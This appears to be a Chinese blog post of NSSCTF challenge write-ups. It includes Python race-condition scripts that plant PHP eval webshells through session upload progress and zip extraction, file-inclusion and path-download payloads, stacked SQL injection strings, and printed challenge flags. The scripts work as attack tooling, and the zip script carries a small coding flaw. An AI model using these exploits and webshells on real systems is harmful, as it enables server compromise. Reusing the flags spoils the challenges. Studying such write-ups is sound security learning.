devbox
很楠不爱3
这个屌丝很懒,什么也没留下!
关注作者
热门标签
热门文章
当前位置:   article > 正文

NSSCTF题解

作者:很楠不爱3 | 2024-06-11 03:23:17

nssctf

[第五空间 2021]EasyCleanup

1.看到题目代码

  1. <?php 
  2. if(!isset($_GET['mode'])){ 
  3.     highlight_file(__file__); 
  4. }else if($_GET['mode'] == "eval"){ 
  5.     $shell = isset($_GET['shell']) ? $_GET['shell'] : 'phpinfo();'; 
  6.     if(strlen($shell) > 15 | filter($shell) | checkNums($shell)) exit("hacker"); 
  7.     eval($shell); 
  8. } 
  9.  
  10.  
  11. if(isset($_GET['file'])){ 
  12.     if(strlen($_GET['file']) > 15 | filter($_GET['file'])) exit("hacker"); 
  13.     include $_GET['file']; 
  14. } 
  15.  
  16.  
  17. function filter($var){ 
  18.     $banned = ["while", "for", "\$_", "include", "env", "require", "?", ":", "^", "+", "-", "%", "*", "`"]; 
  19.  
  20.     foreach($banned as $ban){ 
  21.         if(strstr($var, $ban)) return True; 
  22.     } 
  23.  
  24.     return False; 
  25. } 
  26.  
  27. function checkNums($var){ 
  28.     $alphanum = 'abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ'; 
  29.     $cnt = 0; 
  30.     for($i = 0; $i < strlen($alphanum); $i++){ 
  31.         for($j = 0; $j < strlen($var); $j++){ 
  32.             if($var[$j] == $alphanum[$i]){ 
  33.                 $cnt += 1; 
  34.                 if($cnt > 8) return True; 
  35.             } 
  36.         } 
  37.     } 
  38.     return False; 
  39. } 
  40. ?>

 分析得出,可以通过file进行文件包含构成rce,但是限制了许多字符,绕过有些困难。再次分析,通过构造url得出phpinfo()界面

http://114.115.134.72:32770/?mode=eval

http://114.115.134.72:32770/?mode=eval

http://114.115.134.72:32770/?mode=eval

2.来到phpinfo界面

根据题目cleanup猜想可能是session_upload,查看phpinfo信息

看到session.upload_progress.enabled开启,说明开启session.upload_progress功能,这个功能在我们上传文件时可以把文件上传进度和信息存储在session中。

又看到session.upload_progress.cleanup开启,说明当文件上传结束后,php将会立即清空对应session文件中的内容。所以需要条件竞争。

看到session.save_path,可以看到session文件保存路径。

看到session.use_strict_mode关闭,说明用户可以自己定义自己的sessionid。假如说sessionid=zzzz,则文件上传后会在/tmp目录下生成一个sess_zzzz的文件。

想利用session文件包含getshell,但是上传 文件后文件内容会被清空。怎么办?

于是想到了pyhton的多线程,利用多线程创建竞争条件,在还没删除时进行文件包含getshell。

直接脚本:

  1. import io
  2.  
  3. import requests
  4. import threading  
  5.  
  6. from cffi.backend_ctypes import xrange
  7.  
  8. sessid = '0'
  9. target = 'http://1.14.71.254:28513/'
  10. file = 'ph0ebus.txt'  
  11. f = io.BytesIO(b'a' * 1024 * 50)  
  12.  
  13.  
  14. def write(session):
  15.     while True:
  16.         session.post(target, data={'PHP_SESSION_UPLOAD_PROGRESS': '<?php eval($_GET["cmd"]);?>'},
  17.                      files={'file': (file, f)}, cookies={'PHPSESSID': sessid})
  18.  
  19.  
  20. def read(session):
  21.     while True:
  22.         resp = session.post(
  23.             f"{target}?mode=foo&file=/tmp/sess_{sessid}&cmd=system('cd /;ls;cat nssctfasdasdflag');")
  24.         if file in resp.text:
  25.             print(resp.text)
  26.             event.clear()
  27.         else:
  28.             print("[+]retry")
  29.             # print(resp.text)
  30.  
  31.  
  32. if __name__ == "__main__":
  33.     event = threading.Event()
  34.     with requests.session() as session:
  35.         for i in xrange(1, 30):  
  36.             threading.Thread(target=write, args=(session,)).start()
  37.         for i in xrange(1, 30):
  38.             threading.Thread(target=read, args=(session,)).start()
  39.     event.set()

 NSSCTF{cb37fcd3-1cff-4965-b455-4ec5cdb329c5}

[鹏城杯 2022]简单的php

查看源代码

  1.  <?php
  2. show_source(__FILE__);
  3.     $code = $_GET['code'];
  4.     if(strlen($code) > 80 or preg_match('/[A-Za-z0-9]|\'|"|`|\ |,|\.|-|\+|=|\/|\\|<|>|\$|\?|\^|&|\|/is',$code)){
  5.         die(' Hello');
  6.     }else if(';' === preg_replace('/[^\s\(\)]+?\((?R)?\)/', '', $code)){
  7.         @eval($code);
  8.  
  9.     }
  10.  
  11. ?>

发现想要执行rce必须绕过正则表达式

也就是无字母数字命令执行和无参构造rce

NSSCTF{bfb142cd-1d50-4c37-b63c-051f546a235b} 

[RoarCTF 2019]Easy Java

 进来后看到登录框,第一时间想到弱口令

admin和admin888进去了

 但是进去以后什么也没有

重新试试,点击help

 出现这个页面,于是想到了文件下载,修改url

payload:filename=help.docx

访问失败,修改提交方式为post,下载成功

打开后

 发现啥也没有

于是上网搜了下WEB-INF/web.xml泄露

了解到WEB-INF是Java的WEB应用的安全目录。如果想在页面中直接访问其中的文件,必须通过web.xml文件对要访问的文件进行相应映射才能访问。

/WEB-INF/web.xml:Web应用程序配置文件,描述了 servlet 和其他的应用组件配置及命名规则。

尝试下,构造payload(post提交):filename=/WEB-INF/web.xml

成功下载文件

  1. <?xml version="1.0" encoding="UTF-8"?>
  2.  
  3. -<web-app version="4.0" xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://xmlns.jcp.org/xml/ns/javaee">
  4.  
  5.  
  6. -<welcome-file-list>
  7.  
  8. <welcome-file>Index</welcome-file>
  9.  
  10. </welcome-file-list>
  11.  
  12.  
  13. -<servlet>
  14.  
  15. <servlet-name>IndexController</servlet-name>
  16.  
  17. <servlet-class>com.wm.ctf.IndexController</servlet-class>
  18.  
  19. </servlet>
  20.  
  21.  
  22. -<servlet-mapping>
  23.  
  24. <servlet-name>IndexController</servlet-name>
  25.  
  26. <url-pattern>/Index</url-pattern>
  27.  
  28. </servlet-mapping>
  29.  
  30.  
  31. -<servlet>
  32.  
  33. <servlet-name>LoginController</servlet-name>
  34.  
  35. <servlet-class>com.wm.ctf.LoginController</servlet-class>
  36.  
  37. </servlet>
  38.  
  39.  
  40. -<servlet-mapping>
  41.  
  42. <servlet-name>LoginController</servlet-name>
  43.  
  44. <url-pattern>/Login</url-pattern>
  45.  
  46. </servlet-mapping>
  47.  
  48.  
  49. -<servlet>
  50.  
  51. <servlet-name>DownloadController</servlet-name>
  52.  
  53. <servlet-class>com.wm.ctf.DownloadController</servlet-class>
  54.  
  55. </servlet>
  56.  
  57.  
  58. -<servlet-mapping>
  59.  
  60. <servlet-name>DownloadController</servlet-name>
  61.  
  62. <url-pattern>/Download</url-pattern>
  63.  
  64. </servlet-mapping>
  65.  
  66.  
  67. -<servlet>
  68.  
  69. <servlet-name>FlagController</servlet-name>
  70.  
  71. <servlet-class>com.wm.ctf.FlagController</servlet-class>
  72.  
  73. </servlet>
  74.  
  75.  
  76. -<servlet-mapping>
  77.  
  78. <servlet-name>FlagController</servlet-name>
  79.  
  80. <url-pattern>/Flag</url-pattern>
  81.  
  82. </servlet-mapping>
  83.  
  84. </web-app>

可以看到

<servlet-name>FlagController</servlet-name>

<url-pattern>/Flag</url-pattern>

说明这是一个Java Servlet服务端程序,后缀应为.class

/WEB-INF/classes/:含了站点所有用的 class 文件,包括 servlet class 和非servlet class,他们不能包含在 .jar文件中

构造payload:filename=/WEB-INF/classes/com/wm/ctf/FlagController.class

成功下载文件

 将文件进行反编译,得出一个base64编码的flag

 进行base64解码后得到flag

flag{e3f6f5e5-37f2-4a28-ac68-a8ce4522412e}

[NPUCTF2020]ezinclude

拿到题目查看源码

  1. username/password error<html>
  2. <!--md5($secret.$name)===$pass -->
  3. </html>

看到提示

输入url

/?name=1

用burpsuite抓包 发现

 响应中的hash值随着name参数的变化而变化,但又不完全是md5加密的值,这里看提示后,直接构造payload

name=&pass=fa25e54758d5d5c1927781a6ede89f8a

得到响应

  1. HTTP/1.1 200 OK
  2. Server: openresty
  3. Date: Fri, 17 Mar 2023 02:12:09 GMT
  4. Content-Type: text/html; charset=UTF-8
  5. Content-Length: 165
  6. Connection: close
  7. Vary: Accept-Encoding
  8. X-Powered-By: PHP/7.0.33
  9.  
  10. <script language="javascript" type="text/javascript">
  11.            window.location.href="flflflflag.php";
  12. 	</script>
  13. <html>
  14. <!--md5($secret.$name)===$pass -->
  15. </html>

载入flflflflag.php目录

 发现找不到,用burp抓包后

  1. HTTP/1.1 200 OK
  2. Server: openresty
  3. Date: Fri, 17 Mar 2023 05:44:34 GMT
  4. Content-Type: text/html; charset=UTF-8
  5. Content-Length: 241
  6. Connection: close
  7. Vary: Accept-Encoding
  8. X-Powered-By: PHP/7.0.33
  9.  
  10. <html>
  11. <head>
  12. <script language="javascript" type="text/javascript">
  13.            window.location.href="404.html";
  14. </script>
  15. <title>this_is_not_fl4g_and_åºé¢äºº_wants_girlfriend</title>
  16. </head>
  17. <>
  18. <body>
  19. include($_GET["file"])</body>
  20. </html>

发现include 猜测是伪协议文件包含

构造payload

file=php://filter/read=convert.base64-encode/resource=flflflflag.php

得到响应

  1. <body>
  2. PGh0bWw+CjxoZWFkPgo8c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0IiB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPgogICAgICAgICAgIHdpbmRvdy5sb2NhdGlvbi5ocmVmPSI0MDQuaHRtbCI7Cjwvc2NyaXB0Pgo8dGl0bGU+dGhpc19pc19ub3RfZmw0Z19hbmRf5Ye66aKY5Lq6X3dhbnRzX2dpcmxmcmllbmQ8L3RpdGxlPgo8L2hlYWQ+Cjw+Cjxib2R5Pgo8P3BocAokZmlsZT0kX0dFVFsnZmlsZSddOwppZihwcmVnX21hdGNoKCcvZGF0YXxpbnB1dHx6aXAvaXMnLCRmaWxlKSl7CglkaWUoJ25vbm9ubycpOwp9CkBpbmNsdWRlKCRmaWxlKTsKZWNobyAnaW5jbHVkZSgkX0dFVFsiZmlsZSJdKSc7Cj8+CjwvYm9keT4KPC9odG1sPgo=include($_GET["file"])</body>
  3. </html>

base64解码后,得到:

  1. <html>
  2. <head>
  3. <script language="javascript" type="text/javascript">
  4.            window.location.href="404.html";
  5. </script>
  6. <title>this_is_not_fl4g_and_出题人_wants_girlfriend</title>
  7. </head>
  8. <>
  9. <body>
  10. <?php
  11. $file=$_GET['file'];
  12. if(preg_match('/data|input|zip/is',$file)){
  13. 	die('nonono');
  14. }
  15. @include($file);
  16. echo 'include($_GET["file"])';
  17. ?>
  18. </body>
  19. </html>

直接目录扫描:

  1.  
  2. python dirsearch.py -u http://0893bf8a-b2ee-40c3-9931-11f870f2da53.node4.buuoj.cn:81/ -e * --timeout=2 -t 1 -x 400,403,404,500,503,429 -w db/dict_mode_dict.txt
  3.

扫出来一个dir.php文件

可以查看源码,输入url

/flflflflag.php?file=php://filter/read=convert.base64-encode/resource=dir.php

base64解码后得到:

  1. <?php
  2. var_dump(scandir('/tmp'));
  3. ?>

dir.php能打印临时文件夹里的内容,因此我们要想办法把文件存到tmp文件夹中

利用 session.upload_progress 进行 session 文件包含

编写脚本

  1. import io
  2. import sys
  3. import requests
  4. import threading
  5.  
  6. host = 'http://0893bf8a-b2ee-40c3-9931-11f870f2da53.node4.buuoj.cn:81/flflflflag.php'
  7. sessid = 'zzzz'
  8.  
  9. def POST(session):
  10.     while True:
  11.         f = io.BytesIO(b'a' * 1024 * 50)
  12.         session.post(
  13.             host,
  14.             data={"PHP_SESSION_UPLOAD_PROGRESS":"<?php phpinfo();fputs(fopen('shell.php','w'),'<?php @eval($_POST[cmd])?>');?>"},
  15.             files={"file":('a.txt', f)},
  16.             cookies={'PHPSESSID':sessid}
  17.         )
  18.  
  19. def READ(session):
  20.     while True:
  21.         response = session.get(f'{host}?file=/tmp/sess_{sessid}')
  22.         if 'flag{' not in response.text:
  23.             print('[+++]retry')
  24.         else:
  25.             print(response.text)
  26.             sys.exit(0)
  27.  
  28. with requests.session() as session:
  29.     t1 = threading.Thread(target=POST, args=(session, ))
  30.     t1.daemon = True
  31.     t1.start()
  32.     READ(session)

跑出结果

 flag{fbf56767-b195-43d8-b38c-d5a958d672c6}

[强网杯 2019]随便注

 正常注入

发现过滤 行不通

看题目的源代码

  1. <html>
  2.  
  3. <head>
  4.     <meta charset="UTF-8">
  5.     <title>easy_sql</title>
  6. </head>
  7.  
  8. <body>
  9. <h1>取材于某次真实环境渗透,只说一句话:开发和安全缺一不可</h1>
  10. <!-- sqlmap是没有灵魂的 -->
  11. <form method="get">
  12.     姿势: <input type="text" name="inject" value="1">
  13.     <input type="submit">
  14. </form>
  15.  
  16. <pre>
  17. array(2) {
  18.   [0]=>
  19.   string(1) "1"
  20.   [1]=>
  21.   string(7) "hahahah"
  22. }
  23. <br></pre>
  24.  
  25. </body>
  26.  
  27. </html>

分析源代码:

1,使用了multi_query()函数,可以执行多条sql语句。

2,查询语句为 $sql=select *from `words` where id=$id

3,通过store_result()获取第一条sql语句查询结果,通过var_dump()输出,然后通过more_results()判断是否有更多的结果集,用next_result()方法获取下一个结果集继续输出。

由于select被禁了,可以使用handler代替select。

payload:

1';handler  `1919810931114514` open as a;handler a read first;handler a close;#

payload就是使用handler打开1919810931114514表的句柄,然后读取句柄的第一行即flag的值,然后关闭 

 直接出结果

NSSCTF{ac89f14b-0958-4f1c-b4b3-8775ca4ae0ed}

做完后上网查了下wp 发现还有其他两种解法 值得学习

解法二:通过源代码可以知道图中查询语句是$sql=select *from `words` where id=$id;从名为words的表中查询id=$id的值并返回。

1'; alter table words rename to words1;alter table `1919810931114514` rename to words;alter table words change flag id varchar(50);#

payload意思就是将原本words的名称改掉,然后把表1919810931114514改成words,并且把表1919810931114514的字段flag改成id,这样查询就变成了 select *from `1919810931114514` where flag=$id。就可以查询出flag

解法三:

-1';Set @sql = CONCAT('se','lect * from `1919810931114514`;');Prepare flag from @sql;EXECUTE flag;#

    PREPARE - 准备执行的声明。
    EXECUTE - 执行由PREPARE语句定义的语句。
    DEALLOCATE PREPARE - 发布PREPARE语句。

设置一个声明查询语句select *from 表19,使用CONCAT连接select绕过select,然后EXECUTE执行声明返回结果


 

[鹏城杯 2022]压缩包

查看题目代码

  1.  <?php
  2. highlight_file(__FILE__);
  3.  
  4. function removedir($dir){
  5.     $list= scandir($dir);
  6.     foreach ($list as  $value) {
  7.        if(is_file($dir.'/'.$value)){
  8.          unlink($dir.'/'.$value);
  9.        }else if($value!="."&&$value!=".."){
  10.                 removedir($dir.'/'.$value);
  11.        }
  12.     }
  13. }
  14.  
  15. function unzip($filename){
  16.         $result = [];
  17.         $zip = new ZipArchive();
  18.         $zip->open($filename);
  19.         $dir = $_SERVER['DOCUMENT_ROOT']."/static/upload/".md5($filename);
  20.         if(!is_dir($dir)){
  21.             mkdir($dir);
  22.         }
  23.         if($zip->extractTo($dir)){
  24.         foreach (scandir($dir) as  $value) {
  25.             $file_ext=strrchr($value, '.');
  26.             $file_ext=strtolower($file_ext); //转换为小写
  27.             $file_ext=str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
  28.             $file_ext=trim($file_ext); //收尾去空
  29.             if(is_dir($dir."/".$value)&&$value!="."&&$value!=".."){
  30.                 removedir($dir);
  31.             }
  32.             if(!preg_match("/jpg|png|gif|jpeg/is",$file_ext)){
  33.                 if(is_file($dir."/".$value)){
  34.                     unlink($dir."/".$value);
  35.                 }else{
  36.                     if($value!="."&&$value!="..")
  37.                     array_push($result,$value);
  38.                 }
  39.                 
  40.             }
  41.            
  42.         }
  43.         $zip->close();
  44.         unlink($filename);
  45.         return json_encode($result);
  46.         }else{
  47.             return false;
  48.         }
  49.     }
  50. $content= $_REQUEST['content'];
  51. shell_exec('rm -rf /tmp/*');
  52. $fpath ="/tmp/".md5($content); 
  53. file_put_contents($fpath, base64_decode($content));
  54. echo unzip($fpath);
  55.     ?>
  56. [] [][]

首先看这个代码的逻辑,我们的可控点是content,同时可以写入文件进去,在unzip函数中extractTo可以解压/tmp的文件到$_SERVER['DOCUMENT_ROOT']."/static/upload/".md5($filename),然后经过一大堆过滤,最后就是unlink删除文件,所以我们可以进行条件竞争,在解压文件和删除文件进行竞争

将该文件压缩为1.zip

  1. <?php 
  2. echo '11111';
  3. file_put_contents('/var/www/html/x.php','<?php eval($_POST[cmd]);?>');
  4. ?>

直接脚本 

  1. import requests
  2. import hashlib
  3. import threading
  4. import base64
  5.  
  6. url = "http://1.14.71.254:28116/"
  7. sess=requests.session()
  8. r = open("1.zip", "rb").read()
  9. content = base64.b64encode(r)
  10. data={
  11.     'content': content
  12. }
  13. m=hashlib.md5(content)
  14. md=hashlib.md5(('/tmp/'+str(m.digest().hex())).encode())
  15. def write(session):
  16.     while True:
  17.         resp=session.post(url,data=data)
  18. def read(session):
  19.     while True:
  20.         resp=session.get(url+f'static/upload/{md}/1.php')
  21.         if resp.status_code==200:
  22.             print("success")
  23. if __name__=="__main__":
  24.     event = threading.Event()
  25.     with requests.session() as session:
  26.         for i in range(1, 30):
  27.             threading.Thread(target=write, args=(session,)).start()
  28.  
  29.         for i in range(1, 30):
  30.             threading.Thread(target=read, args=(session,)).start()
  31.     event.set()
  32.

蚁剑连接x.php 密码是cmd 根目录得到flag
 

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/很楠不爱3/article/detail/701499
推荐阅读
相关标签

Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。

  

闽ICP备14008679号